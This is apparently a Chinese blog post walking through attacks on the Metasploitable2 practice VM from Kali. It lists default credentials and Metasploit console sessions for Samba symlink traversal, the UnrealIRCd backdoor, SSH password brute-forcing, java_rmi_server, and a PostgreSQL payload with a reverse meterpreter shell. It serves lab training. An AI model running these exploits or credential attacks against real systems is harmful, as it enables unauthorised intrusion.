zoukankan      html  css  js  c++  java
  • Metasploitable2 靶机漏洞

    演示环境

    1、靶机: Metasploitable2-Linux

         IP:192.168.184.130

    2、攻击机:Kali-Linux-2021.02-amd64

         IP:192.168.184.128

    扫描端口

    系统弱密码登录

    1、在kali上执行命令行telnet 192.168.184.130

    2、Login和password都输入msfadmin

    3、登录成功,进入系统

    4、测试如下:

    PostgreSQL弱密码登录

    1、在Kali上执行psql -h 192.168.184.130 –U postgres

    2、输入密码:postgres

    3、登录成功,进入postgresql系统

    VNC弱密码登录

    1、在kali图形界面的终端中执行vncviewer 192.168.184.130

    2、输入密码 password

    3、登录成功,进入系统

    MySQL弱密码登录

    1、在kali上执行mysql –h 192.168.184.130 –u root

    2、登录成功,进入MySQL系统

    Samba sysmlink 默认配置目录遍历漏洞

    CVE-2010-0926

    端口: 445
    利用模块:

    auxiliary/admin/smb/samba_symlink_traversal
    set SMBSHARE tmp //设置SAM可写文件

     

    UnrealIRCd Backdoor(ircd)

    端口: 6667
    利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor

     msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor 调试模块
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set 查看设置信息
    
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.184.130
    rhosts => 192.168.184.130 设置攻击目标IP地址
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run 执行
    
    [-] 192.168.184.130:6667 - Exploit failed: A payload has not been selected.
    发现没有配置默认的payload
    [*] Exploit completed, but no session was created.

    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads 查看可以使用的payload
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
    payload => cmd/unix/bind_perl
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

     

    ssh用户名密码扫描

    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > search ssh_login 查找模块
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > use auxiliary/scanner/ssh/ssh_login
    msf6 auxiliary(scanner/ssh/ssh_login) > set
    
    msf6 auxiliary(scanner/ssh/ssh_login) > set username root 设置暴力破解的用户名
    username => root
    msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /usr/share/wordlists/metasploit/root_userpass.txt 设置暴力破解文件
    userpass => file /usr/share/worilsts/metasploit/root_userpass.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.184.130 设置攻击目标的IP地址
    rhosts => 192.168.184.130

     

    msf6 auxiliary(scanner/ssh/ssh_login) > run 执行,得出的密码是root

     利用服务器不安全默认配置java代码

    msf6 auxiliary(scanner/ssh/ssh_login) > search java_rmi_server 查询模块
    msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.184.130 设置执行目标IP地址
    rhosts => 192.168.184.130
    msf6 exploit(multi/misc/java_rmi_server) > exploit 执行

     

      

      

    Postgres共享库代码任意执行

    在一些默认的Linux安装的PostgreSQL,postgres服务账户可以写到/tmp目录,还有共享库,允许任意执行代码

    msf6 exploit(multi/misc/java_rmi_server) > search PostgreSQL 查找相应的模块
    
    msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload 调用模块
    [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
    msf6 exploit(linux/postgres/postgres_payload) > set 查看设置
    
    msf6 exploit(linux/postgres/postgres_payload) > set rhosts 192.168.184.130 设置攻击目标IP地址
    rhosts => 192.168.184.130
    msf6 exploit(linux/postgres/postgres_payload) > run 执行

     

    作者:拾瑾
    个性签名:愿历经千帆,归来仍少年.
    本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利.
  • 相关阅读:
    BZOJ2219数论之神——BSGS+中国剩余定理+原根与指标+欧拉定理+exgcd
    Luogu 3690 Link Cut Tree
    CF1009F Dominant Indices
    CF600E Lomsat gelral
    bzoj 4303 数列
    CF1114F Please, another Queries on Array?
    CF1114B Yet Another Array Partitioning Task
    bzoj 1858 序列操作
    bzoj 4852 炸弹攻击
    bzoj 3564 信号增幅仪
  • 原文地址:https://www.cnblogs.com/ayoung/p/15186328.html
Copyright © 2011-2022 走看看